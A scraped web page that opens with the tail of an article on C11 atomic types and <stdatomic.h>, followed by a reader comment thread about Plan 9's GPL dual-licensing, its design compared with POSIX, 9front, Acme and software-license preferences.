lock. However, using atomic data can sometimes be more efficient. Loads and stores of atomic types are done with sequentially consistent semantics. In particular, if thread-1 stores a value in an atomic variable named x, and thread-2 reads that value, then all other stores previously performed in thread-1 (even to non-atomic objects) become visible to thread-2. (The C11 and C++11 standards also provide other models of memory consistency, but even experts are cautioned to avoid them.) The new header <stdatomic.h> provides a large set of named types and functions for the manipulation of atomic data. For example, atomic_llong is the typename provided for atomic long long integers. Similar names are provided for all the integer types. One of these typenames, atomic_flag, is required to be lock free. The standard includes a macro named ATOMIC_VAR_INIT(n), for initializing atomic integers, as shown below. The data race in the previous example can be cured by making x an atomic_llong variable. Simply change the one line that declares x in the aforementioned code sample: #include <stdatomic.h> atomic_llong x = ATOMIC_VAR_INIT(0); By using this atomic variable, the code operates without producing any data-race output.
http://www.drdobbs.com/mobile/c-finally-gets-a-new-standard/232800444
CC-MAIN-2013-20
refinedweb
1,004
54.46
Memory leak when using sourceSize on images in list views? Hi. I'm having memory problems in my application that appears to be due to using sourceSize on images in list views. I've included a small QML-example below that illustrates the issue. It requires a bunch of images in the current directory, which I have not included. When scrolling to the end or the beginning of a list view, I expect to see the memory allocation of qmlscene to drop, since list items are released. When setting sourceSize equal to the image size, the allocation increases for each image coming into view, but never decrease. Scrolling back and forth for a while seems to increase the memory use more and more. However, setting the sourceSize to something different than the image size (such as five times larger), does show the expected behaviour at the end and beginning of the lists. Thing is, in my real application, I'm changing out loads of list items at fast rates in list views, and the memory consumption goes through the roof, since list items (or at least the pixmaps in them) that I expect to go away linger somewhere. Could someone confirm/speculate a bit on if this is indeed a memory leak in Qt and if I should file a bug report, or is this some sort of feature or effect of how sourceSize is supposed to work? @ import QtQuick 2.0 import Qt.labs.folderlistmodel 2.1 Rectangle { id : viewer width: 800 height: 480 ListModel { id : picSrcList } FolderListModel { id: folderModel nameFilters: ["*.png", "*.jpg"] } Component { id : picDelegate Image { id: dynamicImage source: fileName sourceSize.width: dynamicImage.width // * 5 sourceSize.height: dynamicImage.height // * 5 width: 200 height: 200 } } ListView { id: picListView anchors.fill: parent delegate: picDelegate model: folderModel orientation: ListView.Vertical } } @ Win7, Linux, 5.2, 5.3 Possibly related to
https://forum.qt.io/topic/40413/memory-leak-when-using-sourcesize-on-images-in-list-views
CC-MAIN-2018-43
refinedweb
308
55.95
Opened 7 years ago Last modified 6 months ago #9173 new New feature Conditional content of template blocks Description It will be very good if there is some possibility to mark sort of "conditional content" of the template blocks ({% block .. %}), that is the content that is displayed only if in a child template the block has some content. For instance, we have 2 templates: parent.html <table> <tr> <td>{% block firstcol %}{% endblock %}</td> <td>{% block secondcol %}{% endblock %}</td> {% block thirdcol %}<td>{% blockcontent %}</td>{% endblock %} </tr> </table> child.html {% extends 'parent.html' %} {% block firstcol %} 1 {% endblock %} {% block firstcol %} 2 {% endblock %} We should have such an output text: <table> <tr> <td> 1 </td> <td> 2 </td> </tr> </table> but not the following: <table> <tr> <td> 1 </td> <td> 2 </td> <td></td> </tr> </table> Attachments (1) Change History (10) comment:1 Changed 7 years ago by while0pass - Needs documentation unset - Needs tests unset - Patch needs improvement unset comment:2 Changed 6 years ago by jacob - Triage Stage changed from Unreviewed to Design decision needed comment:3 Changed 4 years ago by lukeplant - Severity set to Normal - Type set to New feature Changed 4 years ago by adurdin Patch against current trunk comment:4 Changed 4 years ago by adurdin - Easy pickings unset - Has patch set - Version changed from 1.0 to SVN This scratches an itch for me too, so I thought I’d implement it. My patch in ticket9173.diff (against r16253) implements a new tag, ifnotempty, with the following behaviour: Renders only if at least one variable or template tag within also renders. This allows a variable or template tag to be surrounded by markup, with the markup omitted if the variable or template tag does not render. An `{% else %}` block may also be used. In the following example, the section will not be rendered unless another template extends this one and overrides the `more_information` block:: {% ifnotempty %} <section> <h1>More information</h1> {% block more_information %}{% endblock %} </section> {% endifnotempty %} comment:5 Changed 3 years ago by aaugustin - UI/UX unset Change UI/UX from NULL to False. comment:6 Changed 3 years ago by masterjakul@… - Cc masterjakul@… added comment:7 Changed 2 years ago by jacob - Triage Stage changed from Design decision needed to Someday/Maybe I'm wholly unconvinced by the syntax proposed so far; it seems quite complicated and non-intuitive. However, I'm not opposed to the idea in general. So marking "someday" -- if someone comes up with syntax that makes sense and is easy to explain, then we might consider this. comment:8 Changed 22 months ago by FunkyBob - Cc FunkyBob added I ended up implementing a {% wrapif %} tag, which will render the [optional] head and tail blocks if the body renders as a non-blank [not all whitespace] string. {% wrapif %} <td> {% body %} {% block whatever %}{% endblock %} {% tail %} </td> {% endwrapif %} If body is omitted, the first block is assumed to be the body, and the head empty. If tail is omitted, it is considered empty. I mostly did this to help move container tags out of for loops, where they'd be inside a {% if forloop.first %} and thus cause a test every iteration. comment:9 Changed 6 months ago by alimony I was thinking about this the other day. How about something like: parent.html <table> <tr> <td>{% block firstcol %}{% endblock %}</td> <td>{% block secondcol %}{% endblock %}</td> {% block thirdcol if block.child %}<td>{{ block.child }}</td>{% endblock %} </tr> </table> Which would introduce a {{ block.child }} thing similar to {{ block.super }} And also conditional blocks in general, in which you can specify: {% block title if post.title %}My title{% endif%} Which is the equivalent of, but shorter than: {% block title %} {% if post.title %} {{ post.title }} {% else %} {{ block.super }} {% endif %} {% endblock %} What do you think of all the above? typo: second "firstcol" should be "secondcol", like this:
https://code.djangoproject.com/ticket/9173
CC-MAIN-2015-27
refinedweb
637
60.24
Abstract:. Welcome to the 135th edition of The Java(tm) Specialists' Newsletter, now sent from a beautiful little island in Greece. We arrived safely two weeks ago and have been running around organising the basics, such as purchasing a vehicle, opening a bank account, getting cell phone contracts. Things happen really quickly in Greece. We can get my wife's Greek birth certificate in one week. In South Africa, this took me about 4 months to do. In about a week's time, I should be ready to apply for permanent residence here in Greece, so now I am the "First Java Champion in Greece" :)) javaspecialists.teachable.com: Please visit our new self-study course catalog to see how you can upskill your Java knowledge. A few weeks ago, I presented a Java 5 and a Design Patterns Course in Cape Town to a bunch of developers. They were mostly developing in Linux, and one of the chaps was impressing us all with his multi-core machine. A Dell Latitude notebook, with tons of RAM, a great graphics card, etc. It looked really fast, especially the 3D effects of his desktop. One of the exercises that we do in the Java 5 course is to measure the CPU cycles that a thread has used, as opposed to elapsed time. If you have one CPU in your machine, then these should be roughly the same. However, when you have several CPUs in your machine, the CPU cycles should be a factor more than the elapsed time. The factor should never be more than the number of actual CPUs, and may be less when you either have other processes running, or too many threads per CPU. Also, as all good computer scientists know, you can never scale completely linearly on one machine, so as you approach a large number of CPUs, the factor will grow more slowly. Here is a short piece of code that starts 5 threads. Each thread runs through a loop from 0 to 999999999. For each thread we measure the thread CPU time with the new ThreadMXBean. These are added up and then we divide the total by the elapsed time (also called "wall clock time"). In order to not introduce contention, I'm using the AtomicLong and the CountDownLatch. import java.lang.management.*; import java.util.concurrent.CountDownLatch; import java.util.concurrent.atomic.AtomicLong; public class MultiCoreTester { private static final int THREADS = 5; private static CountDownLatch ct = new CountDownLatch(THREADS); private static AtomicLong total = new AtomicLong(); public static void main(String[] args) throws InterruptedException { long elapsedTime = System.nanoTime(); for (int i = 0; i < THREADS; i++) { Thread thread = new Thread() { public void run() { total.addAndGet(measureThreadCpuTime()); ct.countDown(); } }; thread.start(); } ct.await(); elapsedTime = System.nanoTime() - elapsedTime; System.out.println("Total elapsed time " + elapsedTime); System.out.println("Total thread CPU time " + total.get()); double factor = total.get(); factor /= elapsedTime; System.out.printf("Factor: %.2f%n", factor); } private static long measureThreadCpuTime() { ThreadMXBean tm = ManagementFactory.getThreadMXBean(); long cpuTime = tm.getCurrentThreadCpuTime(); long total=0; for (int i = 0; i < 1000 * 1000 * 1000; i++) { // keep ourselves busy for a while ... // note: we had to add some "work" into the loop or Java 6 // optimizes it away. Thanks to Daniel Einspanjer for // pointing that out. total += i; total *= 10; } cpuTime = tm.getCurrentThreadCpuTime() - cpuTime; System.out.println(total + " ... " + Thread.currentThread() + ": cpuTime = " + cpuTime); return cpuTime; } } When I run this on my little D800 Latitude, I get: Thread[Thread-3,5,main]: cpuTime = 1920000000 Thread[Thread-2,5,main]: cpuTime = 1920000000 Thread[Thread-1,5,main]: cpuTime = 1930000000 Thread[Thread-4,5,main]: cpuTime = 1920000000 Thread[Thread-0,5,main]: cpuTime = 1940000000 Total elapsed time 9759677000 Total thread CPU time 9630000000 Factor: 0.99 As always with performance testing, we have to be careful to run it on a quiet machine. If I copy a large file at the same time while running the test, I get: Thread[Thread-0,5,main]: cpuTime = 1920000000 Thread[Thread-4,5,main]: cpuTime = 1990000000 Thread[Thread-2,5,main]: cpuTime = 1960000000 Thread[Thread-1,5,main]: cpuTime = 1980000000 Thread[Thread-3,5,main]: cpuTime = 1960000000 Total elapsed time 10979895000 Total thread CPU time 9810000000 Factor: 0.89 When I run the program twice in parallel on a quiet system, the Factor should be close to 0.5, hopefully: Thread[Thread-3,5,main]: cpuTime = 4090000000 Thread[Thread-4,5,main]: cpuTime = 4070000000 Thread[Thread-0,5,main]: cpuTime = 2660000000 Thread[Thread-2,5,main]: cpuTime = 4020000000 Thread[Thread-1,5,main]: cpuTime = 2970000000 Total elapsed time 33988220000 Total thread CPU time 17810000000 Factor: 0.52 and the second run, started slightly later Thread[Thread-1,5,main]: cpuTime = 3320000000 Thread[Thread-3,5,main]: cpuTime = 3120000000 Thread[Thread-4,5,main]: cpuTime = 3190000000 Thread[Thread-0,5,main]: cpuTime = 2590000000 Thread[Thread-2,5,main]: cpuTime = 3070000000 Total elapsed time 32353817000 Total thread CPU time 15290000000 Factor: 0.47 When we ran this program on the student's supa-dupa multi-core system, we were puzzled in that the factor was just below 1. We rebooted the machine into Windows, and the factor went up to just below 2. Fortunately we had a system administrator in the group, and he pointed out that the kernel on that Linux machine was incorrect. By simply putting the correct kernel on, the dream machine laptop was able to run at double the CPU cycles. Your exercise for today is to find a multi-core or multi-cpu machine and see what factor you get. You need at least a JDK 5. Let me know how you fare ... :) Just a hint: the number of threads should probably be a multiple of the number of CPUs or cores that you have available. Kind regards from Gree...
https://www.javaspecialists.eu/archive/Issue135-Are-You-Really-Multi-Core.html
CC-MAIN-2020-45
refinedweb
961
63.8
Flux VS Single State Tree?”. By asking this I am not in a position to favor my own creation over Redux. You might say now; “But is not Redux a single state tree?”. Yeah, it is! So what is the difference between Redux and a single state tree library like Baobab? Please read on and I will explain. I will also be answering a more fundamental question about Flux’s verbosity, even in Redux. Yes, I will actually say something bad about Redux. It does not feel good, because Redux is a really great project and Dan Abramov is one of the most humble developers in the community. But I think Dan will agree that even though Redux is stated by some as the de facto standard for Flux we should still bring in new ideas and talk about how we can solve our day to day problems with different approaches. If you have not heard of Flux before you should read up a bit on that first. I will be using Facebook Flux, the Alt project and Redux to explain the evolution of Flux. Then I will compare them to using a single state tree like Baobab to point out that there is a different approach. Flux basics Though Flux has evolved with many different implementations there is still a core idea to Flux. I will not talk about the components, but just imagine they are the ones who triggers state changes and retrieves the current state of the application. Lets draw this up: |-----------------| |----------------| | STATE CONTAINER |<-----| |--| ACTION CREATOR |---< |-----------------| | | |----------------| | | |-----------------| | |------------| | |----------------| | STATE CONTAINER |<---------| DISPATCHER |<----| ACTION CREATOR |---< |-----------------| | |------------| | |----------------| | ^ | |-----------------| | | | |----------------| | STATE CONTAINER |<-----| | |--| ACTION CREATOR |---< |-----------------| | |----------------| | |---------------------------------< A state container is either a store or a reducer and with Flux you need to dispatch actions to these state containers. There are mainly two reasons why you do this dispatching. First of all it gives you a predictable flow. All requests for state change passes through this dispatcher and reaches all state containers. The second reason is that the action object describes a state change in your application without actually doing it. That means this description can be stored. If you reset the state of your application and run these stored state change descriptions you will bring your application back into the exact same state (time travel debugging). Store / Reducer You need a place to contain your state. The initial release of Flux calls these state containers stores. They are typically created with a plain object, like: const TodosStore = { isSaving: false, list: [] }; With Alt this was turned into a class: class TodosStore { constructor() { this.isSaving = false; this.list = []; } } And with Redux we use a function, called a reducer. How reducers differ is that you return state changes instead of mutating the existing state. We use the ImmutableJS project to create our initial state and we will continue to use this library to change our state in the Redux examples below. import Immutable from 'immutable'; const initialState = Immutable.fromJS({ isSaving: false, list: [] }); function TodosReducer(state = initialState, action) { return state; } So all these abstractions has the same purpose. They store state. The way they differ is how you act upon actions and change the state. Lets talk about actions first. Actions With traditional Flux you use a switch statement and we check the action type to act on an action. This means that all actions reaches all stores: import dispatcher from './dispatcher'; const TodosStore = { isSaving: false, list: [] }; TodosStore.dispatchToken = dispatcher.register((payload) => { switch (payload.actionType) { case 'SAVING_TODO': TodosStore.isSaving = true; break; case 'ADD_TODO': TodosStore.list.push(payload.todo); break; case 'SAVED_TODO': TodosStore.isSaving = false; break; } }); With Alt you actually wire the specific actions to the store. The switch statement is often seen as a verbose construct, and with good reason, it is :-) We will look at the actions implementation in the next section, but this is how you would wire it up inside the store: import TodosActions from './TodosActions'; class TodosStore { constructor() { this.isSaving = false; this.list = []; this.bindListeners({ handleSavingTodo: TodosActions.SAVING_TODO, handleAddTodo: TodosActions.ADD_TODO, handleSavedTodo: TodosActions.SAVED_TODO }); } handleSavingTodo() { this.isSaving = true; } handleAddTodo(todo) { this.list.push(todo); } handleSavedTodo() { this.isSaving = false; } } With Redux and a reducer you move back to using switch statements. Notice how we use Immutable JS to return completely new state from the reducer. import Immutable from 'immutable'; const initialState = Immutable.fromJS({ isSaving: false, list: [] }); function TodosReducer(state = initialState, action) { switch (action.type) { case SAVING_TODO: return state.set('isSaving', true); case ADD_TODO: return state.updateIn(['list'], list => list.push(action.todo)); case SAVED_TODO: return state.set('isSaving', false); } return state; } Action creators The initial Flux implementation and Redux allows you to dispatch actions directly to stores/reducers, though very often you need an action creator. An action creator is a function that will do multiple dispatches to the stores. This is often related to asynchronous operations, like talking to the server. With traditional Flux: import dispatcher from './dispatcher'; import ajax from 'ajax'; export default function addTodo(todo) { dispatcher.dispatch({actionType: 'SAVING_TODO'}); ajax.post('/todos', todo) .then(() => { dispatcher.dispatch({actionType: 'SAVED_TODO'}); dispatcher.dispatch({actionType: 'ADD_TODO', todo: todo}); }); } With Alt you always have to use an action creator. import ajax from 'ajax'; export default { savingTodo() { this.dispatch(); } addTodo(todo) { this.actions.savingTodo(); ajax.post('/todos', todo) .then(() => { this.actions.savedTodo(); this.dispatch(todo); }); } savedTodo() { this.dispatch(); } }; And with Redux you also create functions, though you dispatch that function. This function receives the dispatch allowing it to use it multiple times: saveTodo.js import ajax from 'ajax'; export function addTodo() { return (dispatch) => { dispatch({type: 'SAVING_TODO'}); ajax.post('/todos', todo) .then(() => { dispatch({type: 'SAVED_TODO'}); dispatch({ type: 'ADD_TODO', todo: todo }); }); }; }; Comparing Redux with a single state tree So now we have taken a look at how Flux works. I indicated early in this article that Redux differs from a typical state tree. The reason I state that is because you do not define a Redux app as a single state tree, you define the branches separately in reducers and then you attach the branches later. You might say, “what is the difference?”. Readability. This is the first part of what makes Redux, and Flux in general, less readable than a typical single state tree. Like our example above: import todos from './reducers/todos'; { todos } But the tree really looks like this: { todos: { list: [], isSaving: false } } With Redux you do not describe the tree as a whole, but that is one of the greatest benefits of a single state tree. You can just read it and understand the complete state of your application. So let us look more into a tree that is defined and operated on as a whole, like Baobab. import Baobab from 'baobab'; const tree = new Baobab({ todos: { isLoading: false, list: [] } }) So this is actually all we need when defining a Baobab tree. We create the tree by passing the object representing all the state. We do not split it into multiple state containers. If we want more state we just add it to this single object. With very big applications you might decide to split the tree into multiple “applications”, but you will still be able to read all the state of the specific “application” as a whole. But how do we act upon dispatched actions? Well, when you represent all the state in your application as one state container you do not need a dispatcher and actions. There is only one place to go and that is the Baobab tree. And it is still as predictable as traditional Flux. But what about the switch statements, we have to change the state of the tree! With a Baobab tree you do not need to define custom state changing logic, you have an API to change the state. But what about immutability then? You actually do not have to use a reducer to allow immutability, Baobab is also immutable. Think of the tree as always being the same and when you create it, new Baobab({}), you pass the first branch, sitting on the top of the tree. That branch can have more branches and so it grows. So imagine our tree as: isSaving list \ / \ / \ / todos \---/ | | | | <- Tree |___| When we make a change to a branch, like tree.set(['todos', 'isSaving'], false), it will break the whole branch off the tree and also break off any other joined branches, in this case the list branch: isSaving list \ / \ / \ / todos \---/ | | | | <- Tree |___| Now it replaces the branch we changed with a completely new one and then it reattaches the list branch. (false) (true) isSaving isSaving list \ \ / \ \ / \ \ / todos todos \---/ | | | | <- Tree |___| What this boils down to is that you do not need a dispatcher and actions with a single state tree, and you change the state of the tree with imperative programming. An example being: tree.set(['todos', 'isSaving'], true). You might have heard that imperative programming is out and the new thing is functional programming. And yeah, it is really great to see all the projects evolving around functional programming, but that does not mean you should never do imperative programming. It is all about the right tool for the job. And if you think about it, with Redux and Immutable JS you do a lot of imperative programming. Tree basics So let us move back to the beginning of this article and look at how the state changes occur with a single state tree. |----------| |--| FUNCTION | | |----------| | |------| | |----------| | TREE |<----| FUNCTION | |------| | |----------| | | |----------| |--| FUNCTION | |----------| There is no dispatcher and no actions. We just have normal functions that changes the state of the tree. Defining the tree I already showed you this, but let us recap. To create the state of our application we: import Baobab from 'baobab'; export default new Baobab({ todos: { isSaving: false, list: [] } }); Again, we do not split our state definition into different files and create logic for changing the state. We just describe it “as is”. Actions and action creators Since there are no actions using a single state tree you do not really need action creators either. What you need though is to change the state of the state tree. And the way you do that is: import tree from './tree'; import ajax from 'ajax'; function addTodo(todo) { tree.set(['todos', 'isSaving'], true); ajax.post('/todos', todo) .then(() => { tree.set(['todos', 'isSaving'], false); tree.push(['todos'], todo); }); } With a single state tree like Baobab you use imperative programming to do your state changes, just like you do normally in JavaScript. The tree is still immutable though, so any changes to the branches of the tree will replace the whole branch, not just the value on the branch. This makes it possible to do shallow checking of values when rendering React components, making it super fast. Notice the difference here. We only have one construct defining how our application changes its state. We do not have two different constructs, where one defines the async operations (action creator) and an other defines the sync changes (store/reducer). This is really important. This is the second part of how readability of your code is reduced compared to a single state tree like Baobab. Getting back what we lost You might say now that the function above is horrible to test or you can not get time travel with this approach. And yeah, you are right. But if you imagine this state tree being your database and you watch this video Turning the database inside out, you will quickly realize that it is not the database itself that needs to handle these features, it is a transaction layer in front of it. One such layer is cerebral and it is functional. With Cerebral you use a functional approach to define the flow of state changes in your application. And this is where the functional approach shines over imperative approach: const items = [{title: 'foo', isAwesome: true}, {title: 'bar', isAwesome: false}]; // functional const isAwesome = (item) => item.isAwesome; const byTitle = (item) => item.title; const awesomeItemTitles = items.filter(isAwesome).map(byTitle); // imperative const awesomeItemTitles = []; items.forEach((item) => { if (item.isAwesome) { awesomeItemTitle.push(item.title); } }); When defining flow the functional approach gives you something powerful. It gives you the power to describe what is happening to you application in great detail, without the verbosity of implementation details. The line items.filter(isAwesome).map(byTitle) tells you what happens, but the imperative example requires you to read all the implementation details to understand it. This might not make much sense with such a simple example, but you would be surprised how quickly it becomes beneficial. With Cerebral you get the same kind of functional flow, though it allows you to build more complex flows like combining asynchronous flows with synchronous flows, parallel asynchronous flows and even conditional flows. This is the problem space Cerebral tries to solve. Expressing the flow of state changes in your application. And since the functions you are referencing in this flow just operates on its argument you get the testability you want. And yes, you even get time travel debugging. So I have been talking about approaching different problems with different tools, so lets do an experiment where we want to search something: We do a functional reactive approach to events. Observable.fromEvent(input, 'change') .debounce(200) .map((event) => {value: event.target.value}) .forEach(this.props.signals.inputChanged); A functional approach to define complex state changes. signal('inputChanged', [ setInputValue, setLoadingResult, [ getResult, { success: [setResult], error: [setResultError] } ], unsetLoadingResult ]) And an imperative approach to actually change our state values. function setInputValue(input, state) { state.set(['currentValue'], input.value); } This example can of course easily be solved with only one class of programming, it being FRP, functional or imperative. But it is when our applications grow and has to handle XXX times the complexity shown here we start to see each of these approaches has their downsides in terms of readability. Summary There are many things happening in the JavaScript community now and functional programming and functional reactive programming is really starting to get a foothold. That is great! That said, functional concepts does not necessarily mean better in all scenarios. We have been doing imperative programming for a long time, for better and worse and there are features of the imperative style that is completely lost when replaced by functional approaches. In my opinion, one of those features is readability of defining and changing state in your application. I would also like to mention that there are other differences between Redux and Baobab, like Cursors and Monkeys, which would also be interesting comparisons. But this article wanted to make a point on readability, which I hope it did. Thanks for reading and please comment if you completely disagree with me, you think I am completely wrong about this or if you can relate to the statements made.
https://christianalfoni.herokuapp.com/articles/2015_11_16_Flux-vs-Single-State-Tree
CC-MAIN-2019-35
refinedweb
2,444
65.22
//my program should be able to collect two words and compare them outputing the words from word1 which are also in word2 and outputing them and viceversa. my problem is in the last four lines before the return. Please help //Program to shows analysis of texts #include <iostream> // for cin, cout #include <string> #include <iomanip> using namespace std; int main() { string word1, word2; //declaration of words // Welcome message cout<< "------------------------------------------------\n" << " Topiloe's Text analyzer - Release 1.0 \n" << "------------------------------------------------\n\n"; cout<<"Enter two words on one line: "; cin>>word1>>word2; cout<<"Second word you entered is <"<<word2<<"> \n"; cout<<"It is "<<word2.length()<<" characters long\n"; cout<<"Starts with the letter '"<<word2.substr(0,1)<<"'\n"; int last_word; last_word=word2.length()-1; cout<<"Ends with the letter '"<<word2.substr(last_word,1)<<"'\n\n"; cout<<"First word you entered is <"<<word1<<"> \n"; cout<<"It is "<<word1.length()<<" characters long\n"; cout<<"Starts with the letter '"<<word1.substr(0,1)<<"'\n"; last_word=word1.length()-1; cout<<"Ends with the letter '"<<word1.substr(last_word,1)<<"'\n\n"; cout<<"The leters in <"<<word1<<"> which are also in <"<<word2<<"> are"<<word1.find(word2)<<endl; cout<<"There are "<<word1.find(word2)<<" words in "<<word1<<" which are also in "<<word2<<endl; cout<<"The leters in <"<<word2<<"> which are also in <"<<word1<<"> are"<<word2.find(word1)<<endl; cout<<"There are "<<word2.find(word1)<<" words in "<<word2<<" which are also in "<<word1<<endl; return 0; }
https://www.daniweb.com/programming/software-development/threads/473460/text-analysis
CC-MAIN-2018-43
refinedweb
236
68.06
>>IMAGE? This video is a must-see for fans of Plan 9, Raspberry Pi, or both. It's also a great introduction to the OS itself. I can imagine the stuff shown in the video would have been pretty impressive in the 70s. Nowadays, however, Plan9 just appears hopelessly out of date. Looking at that video I felt like I had entered a time machine: Sure, to each their own, but you have to realize that being for a limited audience necessarily carries with it smaller developer numbers and maintaing a modern OS (even just the kernel) requires *tons* of work. Drivers don't write/port themselves, bugs need fixing, new CPU revisions need support changes, etc. etc. I guess if you really focused down on what matters to you and tightly controlled your entire execution environment (hardware/software/etc.) you could limit this to a manageable size, but anything close to general-purpose nowadays requires a lot of work, and hobbyist efforts by a small community can only get you so far. I never said otherwise. I'm an OS hobbyist, as are many of the readers and contributors here, and I know Plan9 isn't feasible for a daily use OS. Neither are Amiga, OS/2, BeOS, Haiku, BareMetalOS, Syllable, and dozens of other obscure, outdated, or tiny projects. That doesn't mean they are uninteresting or not worth reading and talking about. And that's all I'm doing, sharing my joy for such niche OSes. I don't think there's anything wrong with that, especially on this website. A lot of experimental OS development is done under the GPL, so this should definitely increase cross polination between projects. Also, I still remember getting the boxed set of Plan 9 for Christmas while in high school... I remember emailing Brian Kernighan a question about it, when I could barely write a hello world program in C, and amazingly he replied (wish I still had that email). Here's what he had to say about plan 9 in an interview: "." source: Edited 2014-02-15 01:36 UTC I wonder what implications, if any, this has for Glendix: Edited 2014-02-15 02:40 UTC Little. Very few Plan9 code can be directly compiled on Linux (or any other OS), thanks to the unusual C syntax and includes of the Plan9's compiler and standard library, respectively. Plan9 is not a POSIX compliant OS, indeed, Plan9 was made for the very purpose of replacing UNIX and his concepts. It does offer a compatibility layer to port POSIX/ANSI C things to it although. So, code made specifically for Plan9 usually stays on Plan9. I'm afraid this dual-licensing announcement (together with the fact that it is made by UCB, not Lucent) means that Lucent revokes all funding of the project - there were Lucent employee still working on Plan 9 - which means nothing particularly good for Plan 9 in short term. P.S.: If anyone is interested in running Plan 9, it is probably better to start with 9front,[0] which appears to provide better end-user experience on common i386 hardware at this point. P.P.S.: Actually the community around Plan 9 doesn't like GPL too much,[1] so I am puzzled with the motivation behind this move. [0] [1] Yeah I am afraid I can't give that page () high marks. There is little (if nothing) in terms of well thought out reasoning, and instead there is just endless damning by anecdote, and accusations. Hell the page on Java even admits the information on Java is out of date but doesn't care. That whole section can (to my mind) be read as "here are things we don't like, and we will use any argument to justify it". If that is how the 9front team actually thinks then I personally consider them harmful... Most of that stuff was maintained by Uriel, he was also a bit opinated, as you can see in a FOSDEM 2006 presentation. Sadly, he is no longer among us. I miss my discussions with him over at HN/Reddit about Go. I have no problem with opinionated, but to simply assert things and only provide anecdotes is just intellectually lazy. His assertion that CVS/tarballs is better than SVN is particular example. I am not asking you to defend him, or anything he said; but honestly 9front would be better off ditching that whole section and simply saying "these are the things we prefer" without any justification. ddc_, "Harmful Things: GPL, LGPL, Apache Software License, MPL, CC." "Less harmful Alternatives: SC, MIT/X, BSD, CC0, public domain." This is interesting; Too bad they did not provide justifications there. The dislike for the GNU tools kind of makes sense in the context of plan 9, but I don't get why GPL/LGPL are listed. Some of us consider the GPL license to be a less free choice than BSD. Of course, in this context I mean code freedom rather than the GNU definition. Had plan 9 been released under BSDL, parts of it could have been added to *BSD, Linux and various other projects. Now, it's limited to just GPL licensed stuff. For someone not in agreement with the GPL, it is almost as frustrating as not having source code because we can't actually use it. We can modify the original system, but not take the good parts and cross pollinate it. Note, it is not the change of license, it is dual licensing. Given that Plan 9 community has long track record for not being particularly interested in licenses, I would expect that new commits will continue being dual-licensed, and I'm pretty sure that LPL is acceptable for everyone (with notable exception of RMS and other people who don't accept anything but '[A-Z]*GPL'). Had plan 9 been released under BSDL, parts of it could have been added to *BSD, Linux and various other projects. Now, it's limited to just GPL licensed stuff. Given how GPL code has coexisted with the BSD licensed nuts and bots in FreeBSD land for a while. What is stopping Plan9 systems to be adopted by the FreeBSD folks are probablytechnical issues rather than silly licensing red herrings. GPL is actually a pretty good license choice for a small project like this one. When resources are very limited you want to make sure you can get some return from sharing your codebase. Edited 2014-02-16 22:36 UTC Here is explanation: (Although it's a personal blog, I believe it is in line with general cat-v thinking.) Tangentially on topic: one application from plan 9 that is more widely known is Acme text editor that also runs e.g. on Linux: Last I used it years ago, it looked like crap but it seems several people in e.g. fosdem were still using it in GoLang devroom (I wasn't there, but just noticed that in my twitter stream). Maybe time to try it again to celebrate the occasion... What makes plan9 shine is it's way of implementing things behind the scenes. They learned from the mistakes of others and apply this knowledge to build far better programming interfaces. Experienced programmers should appreciate plan 9's achievements in bringing extremely well thought out designs into reality. It's consistent. Network transparency is more natural. I only wish I got to use it more. Plan 9 is what posix should have been. I'm probably biased, but I think posix is holding the industry back. tylerdurden, You got me there... damn your pedantic musings How do I fix this. Ok, lets say plan9 had predated the initial posix standards, the standards would have been better to formally adopt the plan9 APIs than what we have now. For better or worse, posix was aimed at formalizing existing unix vendor interfaces rather than designing good ones. This lengthy rant reflects some of my feelings:... tylerdurden, Yes I used it, albeit a long time ago when I was doing OS research. I didn't do anything "meaningful with it". The GUI was off putting and probably still is, but it's hard to deny the elegance of its functional designs, especially in the context of the nuanced issues that crop up on other platforms. Ultimately though plan9 failed to gain traction, and POSIX designs won out. tylerdurden, I don't see anything in this thread that warranted your response. You never really asked what was better and I had no reason to assume you didn't know. However, for those who don't know, plan 9 takes the 'everything is a file' concept from unix and applies it more cleanly & consistently. For example, unix strayed from the everything is a file with ioctls, signals, netfilter/netlink, etc, with plenty of caveats along the way. This leads to the dependence of specialized local userspace tools to administer & control the system state. This might be ok, except you loose the network transparency that plan9 gives you for free. To achieve the same thing on unix you'd have to build some new client & daemon to shuttle commands from a remote system, perform authentication, and call the local syscalls. Every new syscall needs a new build of the daemon & client. So it's not too elegant, to say nothing of the potential security risks of running a unix userspace daemon as root. Plan9 is elegant because we get all of it for free using the tried and tested security model of the file system. Plan9 also encourages regular applications to include "file servers" that can be unified into the namespace, which is a very powerful way to query and control running applications. POSIX signals, on the other hand are overloaded, scale poorly, and less intuitive (ie sending "kill -USR1" to dd to tell it to print it's status, tells apache to reload configuration & restart, etc). Signals also have their own implementation problems, such as being dropped, restricted to "safe functions", interrupting normal code flow through the event loop. My conclusion only a restatement of what's already been said: most people like the elegance of plan9's approach, however the vast majority (ie everyone) still continues to target POSIX because it's the official standard for writing portable code. I don't know if there's any mainstream software anywhere that takes advantage of plan9's features. I would absolutely love if someone could point one out. Edited 2014-02-18 21:51 UTC I am going to suggest a slight correction to that statement. If it were just that then all POSIX would need is some refactoring of its APIs into this metaphor to gain all of its benefits. The way I see Plan 9 is that it sees everything as objects (which can be filesystems) in a namespace — for a specific definition of object and namespace. Because of this things like file version become much easier because the current version of a file is really a namespace representing the head of all current files. Indeed I think you can get yourself in trouble by reading a path as a collection of files. When I used it, I thought of a path as a collection of objects that interacted with one another. I don't see anything in this thread that warranted your response. It was a JOKE. I personally managed to figure you were also jesting when you called me pedantic. Apparently I can even ask a simple question without getting downvoted... You never really asked what was better and I had no reason to assume you didn't know. I wasn't asking what was better, I was simply trying to figure out the actual technical arguments for those claims were. Stylistic preferences are highly subjective, so I tend to ignore them. That's all. IMO POSIX is an API for portable code (not necessarily distributed), so perhaps it would make more sense to compare Plan 9 to other distributed systems like Amoeba, OpenSSI, or Kerrighed. Thanks for the response, in any case. I have a pattern with Plan 9. A ritual if you will. Every two or three years I'll read an article that will get me excited about Plan 9. The next day I'll research Plan 9: parse its documentation, research supported hardware/VMs, scour the web for posts and testimony of Plan 9's use. On day three I install Plan 9 and poke around by issuing commands to rc, acclimating to acme with its "mouse chording," and then attempting to get networking setup. Day four is my Plan 9 day of rest. Day five I become apathetic to Plan 9, say "meh" and install another OS. really tells all, doesn't it. I laughed out load at that, really. Tk? Really? Not saying looks are all that matters but being an eyesore isn't an asset. I don't see how tcl/tk is somehow quantitatively better than Gtk (and I don’t even like Gtk). It wasn't clear from that conversation, but from others I read it is clear that the reason they liked TK more is because it it had a "cleaner" model to their mind and could map onto their metaphor better. Looks (and functionality) literally took a back seat to serving 